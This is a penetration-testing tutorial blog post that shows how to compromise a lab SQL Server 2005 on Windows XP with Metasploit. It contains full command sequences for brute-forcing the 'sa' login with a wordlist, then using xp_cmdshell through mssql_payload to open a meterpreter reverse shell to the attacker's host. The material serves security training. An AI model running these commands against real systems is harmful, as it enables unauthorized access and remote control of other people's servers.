Home 0P3N Blog Tutorial: Exploiting MS SQL Server with Metasploit - Fast Track
Ready to Start Your Career?
Create Free Account
S-Connect s profile image
By: S-Connect
July 20, 2016

Tutorial: Exploiting MS SQL Server with Metasploit - Fast Track

By: S-Connect
July 20, 2016
S-Connect s profile image
By: S-Connect
July 20, 2016
Exploiting MS SQL Server with Metasploit - Fast Track - CybraryThe exploitee's system comprises: 
  • Windows XP Pro Service Pack 2 (unpatched)
  • Firewall and software updates switched off
  • Microsoft Internet Information Services (IIS) (server) and FTP service enabled
  • SQL Server 2005 Express configured
  • A vulnerable web app up and running
 Let's begin: Nmap scan from within Metasploit. The pertinent results for this exploit are:1433/tcp open  ms-sql-s      Microsoft SQL Server 2005 9.00.1399.00 Running: Microsoft Windows XP|2003OS CPE: cpe:/o:microsoft:windows_xp cpe:/o:microsoft:windows_server_2003OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003Interestingly, Nmap couldn’t definitively identify which Windows Service Pack, but of course, I know it’s Service Pack 2. MS SQL is installed by default on TCP port 1433 and UDP port 1434, so I need to confirm port 1434:

nmap -sU 192.168.1.79 -p1434

PORT STATE SERVICE1434/udp open|filtered ms-sql-m

And, the scan confirms this. Now, use Metasploit mssql_ping to pick up more information:

msf > use scanner/mssql/mssql_pingmsf auxiliary(mssql_ping) > set RHOSTS 192.168.1.79RHOSTS => 192.168.1.79msf auxiliary(mssql_ping) > set THREADS 20THREADS => 20msf auxiliary(mssql_ping) > exploit

[*] SQL Server information for 192.168.1.79:[+] ServerName = LAB[+] InstanceName = SQLEXPRESS[+] IsClustered = No[+] Version = 9.00.1399.06[+] tcp = 1433[*] Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completed

 There's lots of information here. Now, brute force MS SQL with mssql_login:

>msf > use scanner/mssql/mssql_loginmsf auxiliary(mssql_login) > set PASS_FILE /usr/share/set/src/fasttrack/wordlist.txtPASS_FILE => /usr/share/set/src/fasttrack/wordlist.txtmsf auxiliary(mssql_login) > set RHOSTS 192.168.1.79RHOSTS => 192.168.1.79msf auxiliary(mssql_login) > set THREADS 10THREADS => 10msf auxiliary(mssql_login) > exploit

[+] 192.168.1.79:1433 – MSSQL – successful login ‘sa’ : ‘password1′

MS SQL password and login successfully guessed. Now, use the mssql_payload, which exploits xp_cmdshell:

msf > use windows/mssql/mssql_payloadmsf exploit(mssql_payload) > set payload windows/meterpreter/reverse_tcppayload => windows/meterpreter/reverse_tcpmsf exploit(mssql_payload) > set LHOST 192.168.1.70LHOST => 192.168.1.70msf exploit(mssql_payload) > set LPORT 443LPORT => 443msf exploit(mssql_payload) > set RHOST 192.168.1.79RHOST => 192.168.1.79msf exploit(mssql_payload) > set PASSWORD password1PASSWORD => password1msf exploit(mssql_payload) > exploit

[*] Started reverse handler on 192.168.1.70:443[*] The server may have xp_cmdshell disabled, trying to enable it…[*] Command Stager progress – 1.47% done (1499/102246 bytes)

[….]

[*] Sending stage (751104 bytes) to 192.168.1.79[*] Command Stager progress – 100.00% done (102246/102246 bytes)[*] Meterpreter session 1 opened (192.168.1.70:443 -> 192.168.1.79:1293) at 2013-06-13 10:39:46 +0100

meterpreter >

 So, I’m inside the target machine with the Meterpreter shell. I hope this was helpful to you. Please post your comments and questions below.
Schedule Demo

Build your Cybersecurity or IT Career

Accelerate in your role, earn new certifications, and develop cutting-edge skills using the fastest growing catalog in the industry